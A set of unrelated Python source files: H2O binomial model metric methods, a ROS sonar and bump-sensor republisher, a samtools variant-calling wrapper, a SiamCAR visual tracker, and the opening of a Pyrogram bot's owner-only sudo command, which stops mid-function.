tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("precision", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def tpr(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the True Positive Rate for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the tpr value for the training data.
:param valid: If valid is True, then return the tpr value for the validation data.
:param xval: If xval is True, then return the tpr value for the cross validation data.
:return: The tpr for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def tnr(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the True Negative Rate for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the tnr value for the training data.
:param valid: If valid is True, then return the tnr value for the validation data.
:param xval: If xval is True, then return the tnr value for the cross validation data.
:return: The tnr for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tnr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def fnr(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the False Negative Rates for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the fnr value for the training data.
:param valid: If valid is True, then return the fnr value for the validation data.
:param xval: If xval is True, then return the fnr value for the cross validation data.
:return: The fnr for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("fnr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def fpr(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the False Positive Rates for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the fpr value for the training data.
:param valid: If valid is True, then return the fpr value for the validation data.
:param xval: If xval is True, then return the fpr value for the cross validation data.
:return: The fpr for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("fpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def recall(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the Recall (AKA True Positive Rate) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the recall value for the training data.
:param valid: If valid is True, then return the recall value for the validation data.
:param xval: If xval is True, then return the recall value for the cross validation data.
:return: The recall for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def sensitivity(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the sensitivity (AKA True Positive Rate or Recall) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the sensitivity value for the training data.
:param valid: If valid is True, then return the sensitivity value for the validation data.
:param xval: If xval is True, then return the sensitivity value for the cross validation data.
:return: The sensitivity for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def fallout(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the Fallout (AKA False Positive Rate) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the fallout value for the training data.
:param valid: If valid is True, then return the fallout value for the validation data.
:param xval: If xval is True, then return the fallout value for the cross validation data.
:return: The fallout for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("fpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def missrate(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the miss rate (AKA False Negative Rate) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the missrate value for the training data.
:param valid: If valid is True, then return the missrate value for the validation data.
:param xval: If xval is True, then return the missrate value for the cross validation data.
:return: The missrate for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("fnr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def specificity(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the specificity (AKA True Negative Rate) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the specificity value for the training data.
:param valid: If valid is True, then return the specificity value for the validation data.
:param xval: If xval is True, then return the specificity value for the cross validation data.
:return: The specificity for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tnr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def mcc(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the mcc for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the mcc value for the training data.
:param valid: If valid is True, then return the mcc value for the validation data.
:param xval: If xval is True, then return the mcc value for the cross validation data.
:return: The mcc for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("absolute_MCC", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def max_per_class_error(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the max per class error for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the max_per_class_error value for the training data.
:param valid: If valid is True, then return the max_per_class_error value for the validation data.
:param xval: If xval is True, then return the max_per_class_error value for the cross validation data.
:return: The max_per_class_error for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else [[mpca[0],1-mpca[1]] for mpca in v.metric("min_per_class_accuracy", thresholds=thresholds)]
return m.values()[0] if len(m) == 1 else m
def metric(self, metric, thresholds=None, train=False, valid=False, xval=False):
"""
Get the metric value for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param metric: The name of the metric to retrieve (e.g. "f1", "tpr", "accuracy").
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the metrics for the training data.
:param valid: If valid is True, then return the metrics for the validation data.
:param xval: If xval is True, then return the metrics for the cross validation data.
:return: The metrics for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric(metric,thresholds)
return m.values()[0] if len(m) == 1 else m
def plot(self, type="roc", train=False, valid=False, xval=False, **kwargs):
"""
Produce the desired metric plot
If all are False (default), then return the training metric value.
:param type: the type of metric plot (currently, only ROC supported)
:param train: If train is True, then plot for training data.
:param valid: If valid is True, then plot for validation data.
:param xval: If xval is True, then plot for cross validation data.
:param show: if False, the plot is not shown. matplotlib show method is blocking.
:return: None
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
for k,v in zip(tm.keys(),tm.values()):
if v is not None: v.plot(type=type, **kwargs)
def confusion_matrix(self, metrics=None, thresholds=None, train=False, valid=False, xval=False):
"""
Get the confusion matrix for the specified metrics/thresholds
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param metrics: A string (or list of strings) in {"min_per_class_accuracy", "absolute_MCC", "tnr", "fnr", "fpr", "tpr", "precision", "accuracy", "f0point5", "f2", "f1"}
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the confusion matrix value for the training data.
:param valid: If valid is True, then return the confusion matrix value for the validation data.
:param xval: If xval is True, then return the confusion matrix value for the cross validation data.
:return: The confusion matrix for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.confusion_matrix(metrics=metrics, thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def find_threshold_by_max_metric(self,metric,train=False, valid=False, xval=False):
"""
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param train: If train is True, then return the threshold_by_max_metric value for the training data.
:param valid: If valid is True, then return the threshold_by_max_metric value for the validation data.
:param xval: If xval is True, then return the threshold_by_max_metric value for the cross validation data.
:return: The threshold_by_max_metric for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.find_threshold_by_max_metric(metric)
return m.values()[0] if len(m) == 1 else m
def find_idx_by_threshold(self,threshold,train=False, valid=False, xval=False):
"""
Retrieve the index in this metric's threshold list at which the given threshold is located.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param train: If train is True, then return the idx_by_threshold for the training data.
:param valid: If valid is True, then return the idx_by_threshold for the validation data.
:param xval: If xval is True, then return the idx_by_threshold for the cross validation data.
:return: The idx_by_threshold for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.find_idx_by_threshold(threshold)
return m.values()[0] if len(m) == 1 else m
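# Illustrative call pattern (model construction and training omitted; `model` is assumed to be a
# fitted H2OBinomialModel with the relevant metrics available):
#   model.F1(thresholds=[0.3, 0.5])            # training metric only (all flags default to False)
#   model.F1(train=True, valid=True)           # -> {"train": [...], "valid": [...]}
#   model.find_threshold_by_max_metric("f1")   # threshold maximizing F1 on the training metrics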
|
#!/usr/bin/env python
'''
Republishes ultrasonic sensors data from Arduino to normal Range messages
Rebublished bump sensors data from Arduino to fixed distance ranger Range message
_____9___0_____
| 8 1 |
|7 2|
| SONAR |
|6 3|
\ /
\5 4/
\_________/
___13_14__00_01___
|12 02|
|11 03|
| BUMP |
|10 04|
| |
|09 05|
\ /
\08 06/
\_____07_____/
'''
import rospy
from sensor_msgs.msg import Range
from samana_msgs.msg import Int16Array, Bump, ImuCalib
from std_msgs.msg import Bool
import math
def enable_front_sensors_cb(msg):
global enable_front_sensors
enable_front_sensors = msg.data
rospy.loginfo("enable_front_sensors: {}".format(enable_front_sensors))
SONAR_COUNT = 10
sonar_hist = [[] for _ in range(SONAR_COUNT)] # [[],] * SONAR_COUNT BUGFIX
temp_correction_coef = 1.0 # Updated in imu_calib_callback()
enable_front_sensors = True # If false shortens front sonars range and disables from bump sensors
range_sonar_msg = Range()
range_bump_msg = Range()
# 0 1 2 3 4 | 5 6 7 8 9
# sonar_max_ranges = [0.2, 0.5, 0.55, 0.7, 0.5, 0.5, 0.7, 0.55, 0.5, 0.2] # NOTE: tuning filter. Found experimentally
sonar_max_ranges = [0.07, 0.4, 0.45, 0.55, 0.4, 0.4, 0.55, 0.45, 0.4, 0.07] # NOTE: tuning filter. Found experimentally
sonar_max_ranges_disabled = [0.03, 0.06, -1, -1, -1, -1, -1, -1, 0.06, 0.03] # NOTE: tuning filter. Found experimentally
# sonar_max_ranges = [0.4] + [0.5] * 8 + [0.4] # NOTE: tuning filter. Found experimentally
# Publishers
sonar_pub = rospy.Publisher("range_sonar", Range, queue_size=10)
# sonar_pub_all = rospy.Publisher("range_sonar_all", Range, queue_size=5) # NOTE: debug
bump_pub1 = rospy.Publisher("range_bump1", Range, queue_size=10)
bump_pub2 = rospy.Publisher("range_bump2", Range, queue_size=10)
# Subscribers
rospy.Subscriber("params/enable_front_sensors", Bool, enable_front_sensors_cb)
# ------------------------------- FUNCTIONS -------------------------------
def sonar_callback(range_data):
"""
Republishes filtered received distances array to Range messages
"""
time_now = rospy.Time.now() - rospy.Duration(0.04) # 1 / 24Hz (currently unused)
for i in range(SONAR_COUNT):
# Setup message info
range_sonar_msg.header.frame_id = "ultrasonic_%d" % (i + 1)
range_sonar_msg.header.stamp = range_data.header.stamp
range_sonar_msg.max_range = sonar_max_ranges[i] # Set each max range different
# Shorten front sensors range if published to do so
if enable_front_sensors is False and sonar_max_ranges_disabled[i] != -1:
range_sonar_msg.max_range = sonar_max_ranges_disabled[i]
dist = range_data.data[i] / 1000.0 * temp_correction_coef # Distance in meters corrected for temperature
range_sonar_msg.range = dist
# Outlier filter: values in history must be similar to the last one
outlier = is_outlier(dist, i)
if outlier is False:
sonar_pub.publish(range_sonar_msg)
# NOTE: Debug all sonar ranges
# range_sonar_msg.max_range = 10.0
# sonar_pub_all.publish(range_sonar_msg)
def is_outlier(reading, i=0):
"""
Outliers filter for sonars. Considers max speed and recency of readings
:param reading: new distance reading
:param i: index of sonar
:return: True if reading is outlier and should be discarded
Readings come at 24Hz or 41.7ms
"""
# NOTE: tuning range filter parameters
HIST_COUNT = 6 # 6*41.7 = 250.2ms | 7*41.7 = 291.9ms
MAX_OUTLIERS = int(HIST_COUNT // 3) # For every 3 readings 1 outlier is allowed
MAX_DELTA_PER_READING = 0.0292 # 0.5m/s / 24Hz = 0.021m | 0.7m/s - 0.0292cm | 0.03 * 7 = 0.21
NOISE_LEVEL = 0.0275 # Found by graphing sonar data
# Store history of readings
sonar_hist[i].append(reading)
if len(sonar_hist[i]) > HIST_COUNT:
sonar_hist[i].pop(0)
# Find if it's outlier
outlier = False
outliers = 0
for j, dist in enumerate(sonar_hist[i]):
range_thresh = NOISE_LEVEL + MAX_DELTA_PER_READING * j
if abs(reading - dist) > range_thresh:
outliers += 1
if outliers > MAX_OUTLIERS:
outlier = True
break
return outlier
def imu_calib_callback(data):
"""
For calculating correction factor for sonar sensor for different temperature
NOTE: data from Arduino assumes 20degC
"""
global temp_correction_coef
JUNCTION_TEMP = 6 # Because it measures internal chip temp. With no air flow it's 8degC and ~5degC with airflow
ASSUMED_SPEED_OF_SOUND = 343.42 # speed_of_sound = 331.3 + 0.606 * 20degC
corrected_speed_of_sound = 331.3 + 0.606 * (data.temp - JUNCTION_TEMP)
temp_correction_coef = corrected_speed_of_sound / ASSUMED_SPEED_OF_SOUND
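# Worked example for the correction above: with data.temp = 26 degC the junction-corrected air
# temperature is 26 - 6 = 20 degC, so corrected_speed_of_sound = 331.3 + 0.606 * 20 = 343.42 m/s
# and temp_correction_coef = 343.42 / 343.42 = 1.0 (no correction at the assumed 20 degC).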
def bump_callback(bump_data):
"""
Republishes received bitmask to Range messages of fixed distance ranger
"""
global range_bump_msg
BUMP_SENSORS_COUNT = 15
# Static variable equivalent bin_data_old
try:
bump_callback.bin_data_old # Checks if variable exists
bump_callback.bin_prev_posted # Checks if variable exists
bump_callback.last_bump_t # Checks if variable exists
except AttributeError:
bump_callback.bin_data_old = '0' * BUMP_SENSORS_COUNT
bump_callback.bin_prev_posted = [0, ] * BUMP_SENSORS_COUNT
bump_callback.last_bump_t = [rospy.Time.now(), ] * BUMP_SENSORS_COUNT
# print("DEFINED")
# Converting int16 to string of len 15
bin_data = '{data:0{width}b}'.format(data=bump_data.bump_bits, width=BUMP_SENSORS_COUNT)[::-1]
# print(bin_data)
for i in range(BUMP_SENSORS_COUNT):
# Simple filter. Consider trigger if triggered for 2 frame in a row
r = float("inf") # +inf - no detection
if bin_data[i] == '1' and bump_callback.bin_data_old[i] == '1':
r = float("-inf") # -inf - detection bumped
if enable_front_sensors is False and i in [0, 1, 13, 14]:
r = float("inf") # Effectivelly disables 4 front bump sensors
# If not the same range as previous or forced update
if bump_callback.bin_prev_posted[i] != r or rospy.Time.now() - bump_callback.last_bump_t[i] > rospy.Duration(0.4):
bump_callback.last_bump_t[i] = rospy.Time.now()
# Publish bump as fixed Range
range_bump_msg.header.frame_id = "bump_%d" % (i + 1)
range_bump_msg.header.stamp = bump_data.header.stamp
range_bump_msg.range = r
# There's limit of 10 Range messages to display
# https://answers.ros.org/question/11701/rviz-message-filter-queue-size/
if i <= 7:
bump_pub1.publish(range_bump_msg)
bump_callback.bin_prev_posted[i] = range_bump_msg.range
else:
bump_pub2.publish(range_bump_msg)
bump_callback.bin_prev_posted[i] = range_bump_msg.range
# Remember previous bin_data
bump_callback.bin_data_old = bin_data
# ------------------------------- MAIN -------------------------------
if __name__ == "__main__":
rospy.init_node("range_pub")
# Setup static sonar range message data
range_sonar_msg.radiation_type = range_sonar_msg.ULTRASOUND
range_sonar_msg.field_of_view = math.radians(15)
range_sonar_msg.min_range = 0.02
# NOTE: Important if max_range will be set larger than real max range
# Map builder will pickup unexisting obstacles at the end of sonar cone
# It is set for each sensor differently in callback function
# range_sonar_msg.max_range = 7.0
# Setup static bump range message data
range_bump_msg.radiation_type = range_bump_msg.INFRARED
range_bump_msg.field_of_view = math.radians(45) # Wide because the bump sensor can bend
range_bump_msg.min_range = 0.05
range_bump_msg.max_range = range_bump_msg.min_range # Because fixed distance
# Subscribe to topics
rospy.Subscriber("sonar", Int16Array, sonar_callback)
rospy.Subscriber("bump", Bump, bump_callback)
rospy.Subscriber("imu_calib", ImuCalib, imu_calib_callback)
# Don't exit
rospy.spin()
|
#!/usr/bin/env python
__author__ = 'Sergei F. Kliver'
import argparse
from RouToolPa.Tools.Samtools import VariantCall
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--bam_list", action="store", dest="bam_list", type=lambda s: s.split(","), required=True,
help="Comma-separated list of bam files")
parser.add_argument("-r", "--reference", action="store", dest="reference", required=True,
help="Fasta file with reference")
parser.add_argument("-o", "--output_prefix", action="store", dest="output_prefix", required=True,
help="Prefix of output files")
parser.add_argument("-t", "--threads", action="store", dest="threads", default=1, type=int,
help="Number of threads to use. Default: 1 ")
parser.add_argument("-k", "--chunk_length", action="store", dest="chunk_length", default=1000000, type=int,
help="Chunk length. Default: 1 000 000 bp")
parser.add_argument("-d", "--max_per_sample_coverage", action="store", dest="max_per_sample_coverage", type=int,
help="Maximum per sample coverage to use")
parser.add_argument("-q", "--min_base_quality", action="store", dest="min_base_quality", default=30, type=int,
help="Minimum base quality. Default: 30")
parser.add_argument("-m", "--min_mapping_quality", action="store", dest="min_mapping_quality", default=30, type=int,
help="Minimum mapping quality. Default: 30 ")
parser.add_argument("-a", "--mapping_quality_penalty", action="store", dest="mapping_quality_penalty",
type=int,
help="Penalty for mapping quality of reads having long mismatches. "
"Use 50 for BWA. Default: not set")
parser.add_argument("-c", "--consensus_caller_model", action="store_true", dest="consensus_caller_model",
help="Use consensus caller model(old one implemented in samtools). Default: false")
parser.add_argument("-e", "--report_all_positions", action="store_true", dest="report_all_positions", default=False,
help="Report all positions in resulting vcf file. Default: false")
args = parser.parse_args()
VariantCall.threads = args.threads
VariantCall.call_variants(args.reference, args.output_prefix, args.bam_list,
chunk_length=args.chunk_length,
split_dir="split/", max_coverage=args.max_per_sample_coverage,
min_base_quality=args.min_base_quality,
min_mapping_quality=args.min_mapping_quality,
adjust_mapping_quality=args.mapping_quality_penalty,
consensus_caller_model=args.consensus_caller_model,
report_all_positions=args.report_all_positions)
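# Example invocation (script and file names are illustrative):
#   python <this_script>.py -b sample1.bam,sample2.bam -r reference.fasta -o calls -t 8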
|
# Copyright (c) SenseTime. All Rights Reserved.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import torch.nn.functional as F
import cv2
from pysot.utils.bbox import corner2center
from pysot.core.config import cfg
from pysot.tracker.base_tracker import SiameseTracker
from pysot.utils.misc import bbox_clip
import matplotlib.pyplot as plt
class SiamCARTracker(SiameseTracker):
def __init__(self, model, cfg):
super(SiamCARTracker, self).__init__()
hanning = np.hanning(cfg.SCORE_SIZE)
self.window = np.outer(hanning, hanning)
self.model = model
self.model.eval()
def generate_points(stride, size):
ori = - (size // 2) * stride
x, y = np.meshgrid([ori + stride * dx for dx in np.arange(0, size)],
[ori + stride * dy for dy in np.arange(0, size)])
points = np.zeros((size * size, 2), dtype=np.float32)
points[:, 0], points[:, 1] = x.astype(np.float32).flatten(), y.astype(np.float32).flatten()
return points
self.points = generate_points(cfg.STRIDE, cfg.SCORE_SIZE)
def _convert_cls(self, cls):
cls = F.softmax(cls[:,:,:,:], dim=1).data[:,1,:,:].cpu().numpy()
return cls
def init(self, img, bbox):
"""
args:
img(np.ndarray): BGR image
bbox: (x, y, w, h) bbox
"""
self.center_pos = np.array([bbox[0]+(bbox[2]-1)/2,
bbox[1]+(bbox[3]-1)/2])
self.size = np.array([bbox[2], bbox[3]])
# calculate z crop size
w_z = self.size[0] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(self.size)
h_z = self.size[1] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(self.size)
s_z = round(np.sqrt(w_z * h_z))
        # calculate channel average
self.channel_average = np.mean(img, axis=(0, 1))
# get crop
z_crop = self.get_subwindow(img, self.center_pos,
cfg.TRACK.EXEMPLAR_SIZE,
s_z, self.channel_average)
self.model.template(z_crop)
def change(self,r):
return np.maximum(r, 1. / r)
def sz(self, w, h):
pad = (w + h) * 0.5
return np.sqrt((w + pad) * (h + pad))
def cal_penalty(self, lrtbs, penalty_lk):
bboxes_w = lrtbs[0, :, :] + lrtbs[2, :, :]
bboxes_h = lrtbs[1, :, :] + lrtbs[3, :, :]
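        # s_c penalizes changes in overall scale relative to the previous target size
        # (in crop coordinates); r_c penalizes changes in aspect ratio.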
s_c = self.change(self.sz(bboxes_w, bboxes_h) / self.sz(self.size[0]*self.scale_z, self.size[1]*self.scale_z))
r_c = self.change((self.size[0] / self.size[1]) / (bboxes_w / bboxes_h))
penalty = np.exp(-(r_c * s_c - 1) * penalty_lk)
return penalty
def accurate_location(self, max_r_up, max_c_up):
dist = int((cfg.TRACK.INSTANCE_SIZE - (cfg.TRACK.SCORE_SIZE - 1) * 8) / 2)
max_r_up += dist
max_c_up += dist
p_cool_s = np.array([max_r_up, max_c_up])
disp = p_cool_s - (np.array([cfg.TRACK.INSTANCE_SIZE, cfg.TRACK.INSTANCE_SIZE]) - 1.) / 2.
return disp
def coarse_location(self, hp_score_up, p_score_up, scale_score, lrtbs):
upsize = (cfg.TRACK.SCORE_SIZE - 1) * cfg.TRACK.STRIDE + 1
max_r_up_hp, max_c_up_hp = np.unravel_index(hp_score_up.argmax(), hp_score_up.shape)
max_r = int(round(max_r_up_hp / scale_score))
max_c = int(round(max_c_up_hp / scale_score))
max_r = bbox_clip(max_r, 0, cfg.TRACK.SCORE_SIZE-1)
max_c = bbox_clip(max_c, 0, cfg.TRACK.SCORE_SIZE-1)
bbox_region = lrtbs[max_r, max_c, :]
min_bbox = int(cfg.TRACK.REGION_S * cfg.TRACK.EXEMPLAR_SIZE)
max_bbox = int(cfg.TRACK.REGION_L * cfg.TRACK.EXEMPLAR_SIZE)
l_region = int(min(max_c_up_hp, bbox_clip(bbox_region[0], min_bbox, max_bbox)) / 2.0)
t_region = int(min(max_r_up_hp, bbox_clip(bbox_region[1], min_bbox, max_bbox)) / 2.0)
r_region = int(min(upsize - max_c_up_hp, bbox_clip(bbox_region[2], min_bbox, max_bbox)) / 2.0)
b_region = int(min(upsize - max_r_up_hp, bbox_clip(bbox_region[3], min_bbox, max_bbox)) / 2.0)
mask = np.zeros_like(p_score_up)
mask[max_r_up_hp - t_region:max_r_up_hp + b_region + 1, max_c_up_hp - l_region:max_c_up_hp + r_region + 1] = 1
p_score_up = p_score_up * mask
return p_score_up
def getCenter(self,hp_score_up, p_score_up, scale_score,lrtbs):
        # coarse location
score_up = self.coarse_location(hp_score_up, p_score_up, scale_score, lrtbs)
# accurate location
max_r_up, max_c_up = np.unravel_index(score_up.argmax(), score_up.shape)
disp = self.accurate_location(max_r_up,max_c_up)
disp_ori = disp / self.scale_z
new_cx = disp_ori[1] + self.center_pos[0]
new_cy = disp_ori[0] + self.center_pos[1]
return max_r_up, max_c_up, new_cx, new_cy
def track_cam(self, img, hp):
"""
args:
img(np.ndarray): BGR image
return:
            dict: {'bbox': [x, y, width, height], 'x_crop': search-region crop, 'cls': cls score tensor}
"""
w_z = self.size[0] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(self.size)
h_z = self.size[1] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(self.size)
s_z = np.sqrt(w_z * h_z)
self.scale_z = cfg.TRACK.EXEMPLAR_SIZE / s_z
s_x = s_z * (cfg.TRACK.INSTANCE_SIZE / cfg.TRACK.EXEMPLAR_SIZE)
x_crop = self.get_subwindow(img, self.center_pos,
cfg.TRACK.INSTANCE_SIZE,
round(s_x), self.channel_average)
outputs = self.model.track(x_crop)
cls = outputs['cls']
cls_tensor = cls[:, 1, :, :]
cls = cls.data[:, 1, :, :].cpu().numpy().squeeze()
cen = outputs['cen'].data.cpu().numpy()
cen = (cen - cen.min()) / cen.ptp()
cen = cen.squeeze()
lrtbs = outputs['loc'].data.cpu().numpy().squeeze()
# plt.figure(figsize=(25, 25))
# plt.imshow(cls,cmap='viridis') # plasma
# plt.show()
upsize = (cfg.TRACK.SCORE_SIZE - 1) * cfg.TRACK.STRIDE + 1
penalty = self.cal_penalty(lrtbs, hp['penalty_k'])
p_score = penalty * cls * cen
if cfg.TRACK.hanming:
hp_score = p_score * (1 - hp['window_lr']) + self.window * hp['window_lr']
else:
hp_score = p_score
hp_score_up = cv2.resize(hp_score, (upsize, upsize), interpolation=cv2.INTER_CUBIC)
p_score_up = cv2.resize(p_score, (upsize, upsize), interpolation=cv2.INTER_CUBIC)
cls_up = cv2.resize(cls, (upsize, upsize), interpolation=cv2.INTER_CUBIC)
lrtbs = np.transpose(lrtbs, (1, 2, 0))
lrtbs_up = cv2.resize(lrtbs, (upsize, upsize), interpolation=cv2.INTER_CUBIC)
scale_score = upsize / cfg.TRACK.SCORE_SIZE
# get center
max_r_up, max_c_up, new_cx, new_cy = self.getCenter(hp_score_up, p_score_up, scale_score, lrtbs)
# get w h
ave_w = (lrtbs_up[max_r_up, max_c_up, 0] + lrtbs_up[max_r_up, max_c_up, 2]) / self.scale_z
ave_h = (lrtbs_up[max_r_up, max_c_up, 1] + lrtbs_up[max_r_up, max_c_up, 3]) / self.scale_z
s_c = self.change(self.sz(ave_w, ave_h) / self.sz(self.size[0] * self.scale_z, self.size[1] * self.scale_z))
r_c = self.change((self.size[0] / self.size[1]) / (ave_w / ave_h))
penalty = np.exp(-(r_c * s_c - 1) * hp['penalty_k'])
lr = penalty * cls_up[max_r_up, max_c_up] * hp['lr']
new_width = lr * ave_w + (1 - lr) * self.size[0]
new_height = lr * ave_h + (1 - lr) * self.size[1]
# clip boundary
cx = bbox_clip(new_cx, 0, img.shape[1])
cy = bbox_clip(new_cy, 0, img.shape[0])
width = bbox_clip(new_width, 0, img.shape[1])
height = bbox_clip(new_height, 0, img.shape[0])
        # update state
self.center_pos = np.array([cx, cy])
self.size = np.array([width, height])
bbox = [cx - width / 2,
cy - height / 2,
width,
height]
return {
'bbox': bbox,
"x_crop": x_crop,
'cls': cls_tensor
} |
from Music import app, OWNER
import os
import subprocess
import shutil
import re
import sys
import traceback
from Music.MusicUtilities.database.sudo import (get_sudoers, remove_sudo, add_sudo)
from pyrogram import filters, Client
from pyrogram.types import Message
@app.on_message(filters.command("addmsudo") & filters.user(OWNER))
async def useradd(_, message: Message):
if not message.reply_to_message:
if len(message.command) != 2:
await message.reply_text("❌ Reply to a user's message or give username/user_id.")
return
user = message.text.split(None, 1)[1]
if "@" in user:
